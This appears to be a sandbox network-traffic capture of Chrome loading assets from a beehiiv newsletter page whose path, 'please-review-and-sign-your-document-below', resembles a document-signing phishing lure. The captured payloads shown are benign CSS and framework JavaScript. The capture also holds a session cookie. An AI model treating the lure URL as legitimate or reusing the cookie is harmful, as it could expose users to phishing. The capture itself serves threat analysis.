                                                                                                                                            2025-01-15 18:14:32 UTC1369INData Raw: 75 73 7b 6f 75 74 6c 69 6e 65 3a 32 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 6f 75 74 6c 69 6e 65 2d 6f 66 66 73 65 74 3a 32 70 78 3b 2d 2d 74 77 2d 72 69 6e 67 2d 69 6e 73 65 74 3a 20 76 61 72 28 2d 2d 74 77 2d 65 6d 70 74 79 2c 20 29 3b 2d 2d 74 77 2d 72 69 6e 67 2d 6f 66 66 73 65 74 2d 77 69 64 74 68 3a 20 30 70 78 3b 2d 2d 74 77 2d 72 69 6e 67 2d 6f 66 66 73 65 74 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 2d 2d 74 77 2d 72 69 6e 67 2d 63 6f 6c 6f 72 3a 20 23 32 35 36 33 65 62 3b 2d 2d 74 77 2d 72 69 6e 67 2d 6f 66 66 73 65 74 2d 73 68 61 64 6f 77 3a 20 76 61 72 28 2d 2d 74 77 2d 72 69 6e 67 2d 69 6e 73 65 74 29 20 30 20 30 20 30 20 76 61 72 28 2d 2d 74 77 2d 72 69 6e 67 2d 6f 66 66 73 65 74 2d 77 69 64 74 68 29 20 76 61 72 28 2d 2d
                                                                                                                                            Data Ascii: us{outline:2px solid transparent;outline-offset:2px;--tw-ring-inset: var(--tw-empty, );--tw-ring-offset-width: 0px;--tw-ring-offset-color: #fff;--tw-ring-color: #2563eb;--tw-ring-offset-shadow: var(--tw-ring-inset) 0 0 0 var(--tw-ring-offset-width) var(--
                                                                                                                                            2025-01-15 18:14:32 UTC1369INData Raw: 25 33 63 2f 73 76 67 25 33 65 22 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 72 69 67 68 74 20 2e 35 72 65 6d 20 63 65 6e 74 65 72 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 6e 6f 2d 72 65 70 65 61 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 31 2e 35 65 6d 20 31 2e 35 65 6d 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 2e 35 72 65 6d 3b 2d 77 65 62 6b 69 74 2d 70 72 69 6e 74 2d 63 6f 6c 6f 72 2d 61 64 6a 75 73 74 3a 65 78 61 63 74 3b 70 72 69 6e 74 2d 63 6f 6c 6f 72 2d 61 64 6a 75 73 74 3a 65 78 61 63 74 7d 5b 6d 75 6c 74 69 70 6c 65 5d 2c 5b 73 69 7a 65 5d 3a 77 68 65 72 65 28 73 65 6c 65 63 74 3a 6e 6f 74 28 5b 73 69 7a 65 3d 22 31 22 5d 29 29 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 69 6e 69
                                                                                                                                            Data Ascii: %3c/svg%3e");background-position:right .5rem center;background-repeat:no-repeat;background-size:1.5em 1.5em;padding-right:2.5rem;-webkit-print-color-adjust:exact;print-color-adjust:exact}[multiple],[size]:where(select:not([size="1"])){background-image:ini
                                                                                                                                            2025-01-15 18:14:32 UTC1369INData Raw: 61 72 28 2d 2d 74 77 2d 72 69 6e 67 2d 73 68 61 64 6f 77 29 2c 76 61 72 28 2d 2d 74 77 2d 73 68 61 64 6f 77 29 7d 5b 74 79 70 65 3d 63 68 65 63 6b 62 6f 78 5d 3a 63 68 65 63 6b 65 64 2c 5b 74 79 70 65 3d 72 61 64 69 6f 5d 3a 63 68 65 63 6b 65 64 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 63 75 72 72 65 6e 74 43 6f 6c 6f 72 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 31 30 30 25 20 31 30 30 25 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 63 65 6e 74 65 72 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 6e 6f 2d 72 65 70 65 61 74 7d 5b 74 79 70 65 3d 63 68 65 63 6b 62 6f 78 5d 3a 63 68 65 63 6b 65 64 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69
                                                                                                                                            Data Ascii: ar(--tw-ring-shadow),var(--tw-shadow)}[type=checkbox]:checked,[type=radio]:checked{border-color:transparent;background-color:currentColor;background-size:100% 100%;background-position:center;background-repeat:no-repeat}[type=checkbox]:checked{background-i
                                                                                                                                            2025-01-15 18:14:32 UTC1369INData Raw: 70 61 72 65 6e 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 63 75 72 72 65 6e 74 43 6f 6c 6f 72 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 31 30 30 25 20 31 30 30 25 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 63 65 6e 74 65 72 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 6e 6f 2d 72 65 70 65 61 74 7d 40 6d 65 64 69 61 20 28 66 6f 72 63 65 64 2d 63 6f 6c 6f 72 73 3a 20 61 63 74 69 76 65 29 7b 5b 74 79 70 65 3d 63 68 65 63 6b 62 6f 78 5d 3a 69 6e 64 65 74 65 72 6d 69 6e 61 74 65 7b 2d 77 65 62 6b 69 74 2d 61 70 70 65 61 72 61 6e 63 65 3a 61 75 74 6f 3b 2d 6d 6f 7a 2d 61 70 70 65 61 72 61 6e 63 65 3a 61 75 74 6f 3b 61 70 70 65 61 72 61 6e 63 65 3a 61 75 74 6f 7d 7d 5b 74 79 70 65 3d 63 68 65 63 6b 62 6f 78
                                                                                                                                            Data Ascii: parent;background-color:currentColor;background-size:100% 100%;background-position:center;background-repeat:no-repeat}@media (forced-colors: active){[type=checkbox]:indeterminate{-webkit-appearance:auto;-moz-appearance:auto;appearance:auto}}[type=checkbox
                                                                                                                                            2025-01-15 18:14:32 UTC1369INData Raw: 74 77 2d 73 61 74 75 72 61 74 65 3a 20 3b 2d 2d 74 77 2d 73 65 70 69 61 3a 20 3b 2d 2d 74 77 2d 64 72 6f 70 2d 73 68 61 64 6f 77 3a 20 3b 2d 2d 74 77 2d 62 61 63 6b 64 72 6f 70 2d 62 6c 75 72 3a 20 3b 2d 2d 74 77 2d 62 61 63 6b 64 72 6f 70 2d 62 72 69 67 68 74 6e 65 73 73 3a 20 3b 2d 2d 74 77 2d 62 61 63 6b 64 72 6f 70 2d 63 6f 6e 74 72 61 73 74 3a 20 3b 2d 2d 74 77 2d 62 61 63 6b 64 72 6f 70 2d 67 72 61 79 73 63 61 6c 65 3a 20 3b 2d 2d 74 77 2d 62 61 63 6b 64 72 6f 70 2d 68 75 65 2d 72 6f 74 61 74 65 3a 20 3b 2d 2d 74 77 2d 62 61 63 6b 64 72 6f 70 2d 69 6e 76 65 72 74 3a 20 3b 2d 2d 74 77 2d 62 61 63 6b 64 72 6f 70 2d 6f 70 61 63 69 74 79 3a 20 3b 2d 2d 74 77 2d 62 61 63 6b 64 72 6f 70 2d 73 61 74 75 72 61 74 65 3a 20 3b 2d 2d 74 77 2d 62 61 63 6b 64 72
                                                                                                                                            Data Ascii: tw-saturate: ;--tw-sepia: ;--tw-drop-shadow: ;--tw-backdrop-blur: ;--tw-backdrop-brightness: ;--tw-backdrop-contrast: ;--tw-backdrop-grayscale: ;--tw-backdrop-hue-rotate: ;--tw-backdrop-invert: ;--tw-backdrop-opacity: ;--tw-backdrop-saturate: ;--tw-backdr
                                                                                                                                            2025-01-15 18:14:32 UTC1369INData Raw: 65 3a 20 3b 2d 2d 74 77 2d 62 61 63 6b 64 72 6f 70 2d 73 65 70 69 61 3a 20 3b 2d 2d 74 77 2d 63 6f 6e 74 61 69 6e 2d 73 69 7a 65 3a 20 3b 2d 2d 74 77 2d 63 6f 6e 74 61 69 6e 2d 6c 61 79 6f 75 74 3a 20 3b 2d 2d 74 77 2d 63 6f 6e 74 61 69 6e 2d 70 61 69 6e 74 3a 20 3b 2d 2d 74 77 2d 63 6f 6e 74 61 69 6e 2d 73 74 79 6c 65 3a 20 7d 2e 63 6f 6e 74 61 69 6e 65 72 7b 77 69 64 74 68 3a 31 30 30 25 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 36 34 30 70 78 29 7b 2e 63 6f 6e 74 61 69 6e 65 72 7b 6d 61 78 2d 77 69 64 74 68 3a 36 34 30 70 78 7d 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 37 36 38 70 78 29 7b 2e 63 6f 6e 74 61 69 6e 65 72 7b 6d 61 78 2d 77 69 64 74 68 3a 37 36 38 70 78 7d 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64
                                                                                                                                            Data Ascii: e: ;--tw-backdrop-sepia: ;--tw-contain-size: ;--tw-contain-layout: ;--tw-contain-paint: ;--tw-contain-style: }.container{width:100%}@media (min-width: 640px){.container{max-width:640px}}@media (min-width: 768px){.container{max-width:768px}}@media (min-wid
                                                                                                                                            2025-01-15 18:14:32 UTC1369INData Raw: 7b 6c 65 66 74 3a 2e 37 35 72 65 6d 7d 2e 6c 65 66 74 2d 33 36 7b 6c 65 66 74 3a 39 72 65 6d 7d 2e 6c 65 66 74 2d 34 7b 6c 65 66 74 3a 31 72 65 6d 7d 2e 6c 65 66 74 2d 36 7b 6c 65 66 74 3a 31 2e 35 72 65 6d 7d 2e 6c 65 66 74 2d 38 7b 6c 65 66 74 3a 32 72 65 6d 7d 2e 6c 65 66 74 2d 5c 5b 31 34 70 78 5c 5d 7b 6c 65 66 74 3a 31 34 70 78 7d 2e 6c 65 66 74 2d 5c 5b 35 30 5c 25 5c 5d 7b 6c 65 66 74 3a 35 30 25 7d 2e 6c 65 66 74 2d 61 75 74 6f 7b 6c 65 66 74 3a 61 75 74 6f 7d 2e 72 69 67 68 74 2d 30 7b 72 69 67 68 74 3a 30 7d 2e 72 69 67 68 74 2d 31 5c 2f 32 7b 72 69 67 68 74 3a 35 30 25 7d 2e 72 69 67 68 74 2d 32 7b 72 69 67 68 74 3a 2e 35 72 65 6d 7d 2e 72 69 67 68 74 2d 33 7b 72 69 67 68 74 3a 2e 37 35 72 65 6d 7d 2e 72 69 67 68 74 2d 34 7b 72 69 67 68 74 3a
                                                                                                                                            Data Ascii: {left:.75rem}.left-36{left:9rem}.left-4{left:1rem}.left-6{left:1.5rem}.left-8{left:2rem}.left-\[14px\]{left:14px}.left-\[50\%\]{left:50%}.left-auto{left:auto}.right-0{right:0}.right-1\/2{right:50%}.right-2{right:.5rem}.right-3{right:.75rem}.right-4{right:


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            3192.168.2.1649713104.18.69.404436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:32 UTC847OUTGET /assets/entry.client-CuBsnk-1.js HTTP/1.1
                                                                                                                                            Host: kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                            Origin: https://kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                            Accept: */*
                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                            Referer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-below
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
                                                                                                                                            2025-01-15 18:14:32 UTC916INHTTP/1.1 200 OK
                                                                                                                                            Date: Wed, 15 Jan 2025 18:14:32 GMT
                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                            Content-Length: 341783
                                                                                                                                            Connection: close
                                                                                                                                            Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1736960704&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=ZSTm5tjtoUyepT8GE0uMWa%2BNcCEepGTOSPZjUVss40E%3D"}]}
                                                                                                                                            Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1736960704&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=ZSTm5tjtoUyepT8GE0uMWa%2BNcCEepGTOSPZjUVss40E%3D
                                                                                                                                            Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                            Last-Modified: Tue, 24 Dec 2024 16:29:01 GMT
                                                                                                                                            Etag: W/"53717-193f98014c8"
                                                                                                                                            Via: 1.1 vegur, 1.1 vegur
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Age: 4159
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9027d894fbf97c6a-EWR
                                                                                                                                            2025-01-15 18:14:32 UTC453INData Raw: 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 39 38 38 64 30 33 32 61 2d 65 30 33 31 2d 35 30 34 32 2d 62 37 64 34 2d 36 62 31 33 62 34 65 64 35 35 38 32 22 29 7d 63 61 74 63 68 28
                                                                                                                                            Data Ascii: !function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="988d032a-e031-5042-b7d4-6b13b4ed5582")}catch(
                                                                                                                                            2025-01-15 18:14:32 UTC1369INData Raw: 2c 64 20 61 73 20 67 79 7d 66 72 6f 6d 22 2e 2f 64 61 79 6a 73 2e 6d 69 6e 2d 42 38 43 66 67 41 68 55 2e 6a 73 22 3b 69 6d 70 6f 72 74 7b 69 20 61 73 20 76 79 2c 70 20 61 73 20 64 63 2c 5f 20 61 73 20 61 73 2c 73 20 61 73 20 42 6e 2c 61 20 61 73 20 53 79 2c 62 20 61 73 20 5f 79 2c 63 20 61 73 20 62 79 2c 64 20 61 73 20 45 79 2c 65 20 61 73 20 4d 79 2c 66 20 61 73 20 77 79 2c 67 20 61 73 20 52 79 2c 68 20 61 73 20 54 79 2c 75 20 61 73 20 41 79 2c 6a 20 61 73 20 4f 79 2c 53 20 61 73 20 44 79 2c 6b 20 61 73 20 78 79 2c 6c 20 61 73 20 43 79 2c 6d 20 61 73 20 7a 79 2c 6e 20 61 73 20 67 64 2c 6f 20 61 73 20 6b 79 2c 71 20 61 73 20 4e 79 2c 72 20 61 73 20 55 79 2c 74 20 61 73 20 4c 79 7d 66 72 6f 6d 22 2e 2f 70 65 72 66 6f 72 6d 61 6e 63 65 2d 64 66 55 5f 5a 4b
                                                                                                                                            Data Ascii: ,d as gy}from"./dayjs.min-B8CfgAhU.js";import{i as vy,p as dc,_ as as,s as Bn,a as Sy,b as _y,c as by,d as Ey,e as My,f as wy,g as Ry,h as Ty,u as Ay,j as Oy,S as Dy,k as xy,l as Cy,m as zy,n as gd,o as ky,q as Ny,r as Uy,t as Ly}from"./performance-dfU_ZK
                                                                                                                                            2025-01-15 18:14:32 UTC1369INData Raw: 72 5f 4e 6f 76 65 6d 62 65 72 5f 44 65 63 65 6d 62 65 72 22 2e 73 70 6c 69 74 28 22 5f 22 29 2c 6f 72 64 69 6e 61 6c 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 76 61 72 20 61 3d 5b 22 74 68 22 2c 22 73 74 22 2c 22 6e 64 22 2c 22 72 64 22 5d 2c 69 3d 6e 25 31 30 30 3b 72 65 74 75 72 6e 22 5b 22 2b 6e 2b 28 61 5b 28 69 2d 32 30 29 25 31 30 5d 7c 7c 61 5b 69 5d 7c 7c 61 5b 30 5d 29 2b 22 5d 22 7d 7d 7d 29 7d 29 28 67 67 29 3b 76 61 72 20 76 67 3d 7b 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 28 66 75 6e 63 74 69 6f 6e 28 6e 2c 61 29 7b 74 2e 65 78 70 6f 72 74 73 3d 61 28 4a 69 28 29 29 7d 29 28 6d 65 2c 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 66 75 6e 63 74 69 6f 6e 20 61 28 72 29 7b 72 65 74 75 72 6e 20 72 26 26 74 79 70 65 6f
                                                                                                                                            Data Ascii: r_November_December".split("_"),ordinal:function(n){var a=["th","st","nd","rd"],i=n%100;return"["+n+(a[(i-20)%10]||a[i]||a[0])+"]"}}})})(gg);var vg={exports:{}};(function(t,e){(function(n,a){t.exports=a(Ji())})(me,function(n){function a(r){return r&&typeo
                                                                                                                                            2025-01-15 18:14:32 UTC1369INData Raw: 65 6e 22 2c 68 3a 5b 22 65 69 6e 65 20 53 74 75 6e 64 65 22 2c 22 65 69 6e 65 72 20 53 74 75 6e 64 65 22 5d 2c 68 68 3a 22 25 64 20 53 74 75 6e 64 65 6e 22 2c 64 3a 5b 22 65 69 6e 20 54 61 67 22 2c 22 65 69 6e 65 6d 20 54 61 67 22 5d 2c 64 64 3a 5b 22 25 64 20 54 61 67 65 22 2c 22 25 64 20 54 61 67 65 6e 22 5d 2c 4d 3a 5b 22 65 69 6e 20 4d 6f 6e 61 74 22 2c 22 65 69 6e 65 6d 20 4d 6f 6e 61 74 22 5d 2c 4d 4d 3a 5b 22 25 64 20 4d 6f 6e 61 74 65 22 2c 22 25 64 20 4d 6f 6e 61 74 65 6e 22 5d 2c 79 3a 5b 22 65 69 6e 20 4a 61 68 72 22 2c 22 65 69 6e 65 6d 20 4a 61 68 72 22 5d 2c 79 79 3a 5b 22 25 64 20 4a 61 68 72 65 22 2c 22 25 64 20 4a 61 68 72 65 6e 22 5d 7d 3b 66 75 6e 63 74 69 6f 6e 20 72 28 75 2c 6f 2c 66 29 7b 76 61 72 20 64 3d 6c 5b 66 5d 3b 72 65 74 75
                                                                                                                                            Data Ascii: en",h:["eine Stunde","einer Stunde"],hh:"%d Stunden",d:["ein Tag","einem Tag"],dd:["%d Tage","%d Tagen"],M:["ein Monat","einem Monat"],MM:["%d Monate","%d Monaten"],y:["ein Jahr","einem Jahr"],yy:["%d Jahre","%d Jahren"]};function r(u,o,f){var d=l[f];retu
                                                                                                                                            2025-01-15 18:14:32 UTC1369INData Raw: 61 22 2e 73 70 6c 69 74 28 22 5f 22 29 2c 6d 6f 6e 74 68 73 3a 22 6a 61 6e 76 69 65 72 5f 66 c3 a9 76 72 69 65 72 5f 6d 61 72 73 5f 61 76 72 69 6c 5f 6d 61 69 5f 6a 75 69 6e 5f 6a 75 69 6c 6c 65 74 5f 61 6f c3 bb 74 5f 73 65 70 74 65 6d 62 72 65 5f 6f 63 74 6f 62 72 65 5f 6e 6f 76 65 6d 62 72 65 5f 64 c3 a9 63 65 6d 62 72 65 22 2e 73 70 6c 69 74 28 22 5f 22 29 2c 6d 6f 6e 74 68 73 53 68 6f 72 74 3a 22 6a 61 6e 76 2e 5f 66 c3 a9 76 72 2e 5f 6d 61 72 73 5f 61 76 72 2e 5f 6d 61 69 5f 6a 75 69 6e 5f 6a 75 69 6c 2e 5f 61 6f c3 bb 74 5f 73 65 70 74 2e 5f 6f 63 74 2e 5f 6e 6f 76 2e 5f 64 c3 a9 63 2e 22 2e 73 70 6c 69 74 28 22 5f 22 29 2c 77 65 65 6b 53 74 61 72 74 3a 31 2c 79 65 61 72 53 74 61 72 74 3a 34 2c 66 6f 72 6d 61 74 73 3a 7b 4c 54 3a 22 48 48 3a 6d 6d
                                                                                                                                            Data Ascii: a".split("_"),months:"janvier_fvrier_mars_avril_mai_juin_juillet_aot_septembre_octobre_novembre_dcembre".split("_"),monthsShort:"janv._fvr._mars_avr._mai_juin_juil._aot_sept._oct._nov._dc.".split("_"),weekStart:1,yearStart:4,formats:{LT:"HH:mm
                                                                                                                                            2025-01-15 18:14:32 UTC1369INData Raw: 20 25 73 22 2c 70 61 73 74 3a 22 25 73 20 66 61 22 2c 73 3a 22 71 75 61 6c 63 68 65 20 73 65 63 6f 6e 64 6f 22 2c 6d 3a 22 75 6e 20 6d 69 6e 75 74 6f 22 2c 6d 6d 3a 22 25 64 20 6d 69 6e 75 74 69 22 2c 68 3a 22 75 6e 27 20 6f 72 61 22 2c 68 68 3a 22 25 64 20 6f 72 65 22 2c 64 3a 22 75 6e 20 67 69 6f 72 6e 6f 22 2c 64 64 3a 22 25 64 20 67 69 6f 72 6e 69 22 2c 4d 3a 22 75 6e 20 6d 65 73 65 22 2c 4d 4d 3a 22 25 64 20 6d 65 73 69 22 2c 79 3a 22 75 6e 20 61 6e 6e 6f 22 2c 79 79 3a 22 25 64 20 61 6e 6e 69 22 7d 2c 6f 72 64 69 6e 61 6c 3a 66 75 6e 63 74 69 6f 6e 28 72 29 7b 72 65 74 75 72 6e 20 72 2b 22 c2 ba 22 7d 7d 3b 72 65 74 75 72 6e 20 69 2e 64 65 66 61 75 6c 74 2e 6c 6f 63 61 6c 65 28 6c 2c 6e 75 6c 6c 2c 21 30 29 2c 6c 7d 29 7d 29 28 62 67 29 3b 76 61 72
                                                                                                                                            Data Ascii: %s",past:"%s fa",s:"qualche secondo",m:"un minuto",mm:"%d minuti",h:"un' ora",hh:"%d ore",d:"un giorno",dd:"%d giorni",M:"un mese",MM:"%d mesi",y:"un anno",yy:"%d anni"},ordinal:function(r){return r+""}};return i.default.locale(l,null,!0),l})})(bg);var
                                                                                                                                            2025-01-15 18:14:32 UTC1369INData Raw: 37 66 38 63 38 64 22 2c 63 6f 6c 6f 72 3a 22 77 68 69 74 65 22 2c 22 62 6f 72 64 65 72 2d 72 61 64 69 75 73 22 3a 22 30 2e 35 65 6d 22 2c 22 66 6f 6e 74 2d 77 65 69 67 68 74 22 3a 22 62 6f 6c 64 22 2c 70 61 64 64 69 6e 67 3a 22 32 70 78 20 30 2e 35 65 6d 22 7d 2c 69 6e 66 6f 3a 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 22 23 33 34 39 38 64 62 22 2c 63 6f 6c 6f 72 3a 22 77 68 69 74 65 22 2c 22 62 6f 72 64 65 72 2d 72 61 64 69 75 73 22 3a 22 30 2e 35 65 6d 22 2c 22 66 6f 6e 74 2d 77 65 69 67 68 74 22 3a 22 62 6f 6c 64 22 2c 70 61 64 64 69 6e 67 3a 22 32 70 78 20 30 2e 35 65 6d 22 7d 2c 6c 6f 67 3a 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 22 23 32 65 63 63 37 31 22 2c 63 6f 6c 6f 72 3a 22 77 68 69 74 65 22 2c 22 62 6f 72 64 65 72 2d 72 61 64 69 75 73 22 3a 22 30 2e 35
                                                                                                                                            Data Ascii: 7f8c8d",color:"white","border-radius":"0.5em","font-weight":"bold",padding:"2px 0.5em"},info:{background:"#3498db",color:"white","border-radius":"0.5em","font-weight":"bold",padding:"2px 0.5em"},log:{background:"#2ecc71",color:"white","border-radius":"0.5
                                                                                                                                            2025-01-15 18:14:32 UTC1369INData Raw: 29 7b 74 68 69 73 2e 73 68 6f 75 6c 64 4c 6f 67 28 22 64 65 62 75 67 22 29 26 26 74 68 69 73 2e 70 72 69 6e 74 28 22 64 65 62 75 67 22 2c 65 29 7d 69 6e 66 6f 28 2e 2e 2e 65 29 7b 74 68 69 73 2e 73 68 6f 75 6c 64 4c 6f 67 28 22 69 6e 66 6f 22 29 26 26 74 68 69 73 2e 70 72 69 6e 74 28 22 69 6e 66 6f 22 2c 65 29 7d 6c 6f 67 28 2e 2e 2e 65 29 7b 74 68 69 73 2e 73 68 6f 75 6c 64 4c 6f 67 28 22 6c 6f 67 22 29 26 26 74 68 69 73 2e 70 72 69 6e 74 28 22 6c 6f 67 22 2c 65 29 7d 77 61 72 6e 28 2e 2e 2e 65 29 7b 74 68 69 73 2e 73 68 6f 75 6c 64 4c 6f 67 28 22 77 61 72 6e 22 29 26 26 74 68 69 73 2e 70 72 69 6e 74 28 22 77 61 72 6e 22 2c 65 29 7d 65 72 72 6f 72 28 2e 2e 2e 65 29 7b 74 68 69 73 2e 73 68 6f 75 6c 64 4c 6f 67 28 22 65 72 72 6f 72 22 29 26 26 74 68 69 73
                                                                                                                                            Data Ascii: ){this.shouldLog("debug")&&this.print("debug",e)}info(...e){this.shouldLog("info")&&this.print("info",e)}log(...e){this.shouldLog("log")&&this.print("log",e)}warn(...e){this.shouldLog("warn")&&this.print("warn",e)}error(...e){this.shouldLog("error")&&this
                                                                                                                                            2025-01-15 18:14:32 UTC1369INData Raw: 65 63 6b 20 6f 75 74 20 68 74 74 70 73 3a 2f 2f 72 65 6d 69 78 2e 72 75 6e 2f 67 75 69 64 65 73 2f 65 72 72 6f 72 73 20 66 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 22 0a 20 20 20 20 20 20 20 20 29 3b 0a 20 20 20 20 20 20 60 7d 7d 29 3b 69 66 28 75 79 28 74 29 29 72 65 74 75 72 6e 20 55 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 46 73 2c 7b 74 69 74 6c 65 3a 22 55 6e 68 61 6e 64 6c 65 64 20 54 68 72 6f 77 6e 20 52 65 73 70 6f 6e 73 65 21 22 7d 2c 55 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 68 31 22 2c 7b 73 74 79 6c 65 3a 7b 66 6f 6e 74 53 69 7a 65 3a 22 32 34 70 78 22 7d 7d 2c 74 2e 73 74 61 74 75 73 2c 22 20 22 2c 74 2e 73 74 61 74 75 73 54 65 78 74 29 2c 65 29 3b 6c 65 74 20 6e 3b 69 66 28 74 20 69 6e 73 74 61 6e 63 65 6f 66
                                                                                                                                            Data Ascii: eck out https://remix.run/guides/errors for more information." ); `}});if(uy(t))return U.createElement(Fs,{title:"Unhandled Thrown Response!"},U.createElement("h1",{style:{fontSize:"24px"}},t.status," ",t.statusText),e);let n;if(t instanceof
                                                                                                                                            2025-01-15 18:14:32 UTC1369INData Raw: 49 54 0a 20 2a 2f 66 75 6e 63 74 69 6f 6e 20 77 67 28 74 29 7b 69 66 28 21 74 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 6c 65 74 20 65 3d 4f 62 6a 65 63 74 2e 65 6e 74 72 69 65 73 28 74 29 2c 6e 3d 7b 7d 3b 66 6f 72 28 6c 65 74 5b 61 2c 69 5d 6f 66 20 65 29 69 66 28 69 26 26 69 2e 5f 5f 74 79 70 65 3d 3d 3d 22 52 6f 75 74 65 45 72 72 6f 72 52 65 73 70 6f 6e 73 65 22 29 6e 5b 61 5d 3d 6e 65 77 20 47 6c 28 69 2e 73 74 61 74 75 73 2c 69 2e 73 74 61 74 75 73 54 65 78 74 2c 69 2e 64 61 74 61 2c 69 2e 69 6e 74 65 72 6e 61 6c 3d 3d 3d 21 30 29 3b 65 6c 73 65 20 69 66 28 69 26 26 69 2e 5f 5f 74 79 70 65 3d 3d 3d 22 45 72 72 6f 72 22 29 7b 69 66 28 69 2e 5f 5f 73 75 62 54 79 70 65 29 7b 6c 65 74 20 6c 3d 77 69 6e 64 6f 77 5b 69 2e 5f 5f 73 75 62 54 79 70 65 5d 3b 69
                                                                                                                                            Data Ascii: IT */function wg(t){if(!t)return null;let e=Object.entries(t),n={};for(let[a,i]of e)if(i&&i.__type==="RouteErrorResponse")n[a]=new Gl(i.status,i.statusText,i.data,i.internal===!0);else if(i&&i.__type==="Error"){if(i.__subType){let l=window[i.__subType];i


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            4192.168.2.1649717104.18.69.404436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:32 UTC840OUTGET /assets/index-D6da9p6-.js HTTP/1.1
                                                                                                                                            Host: kanes-newsletter-871ead.beehiiv.com
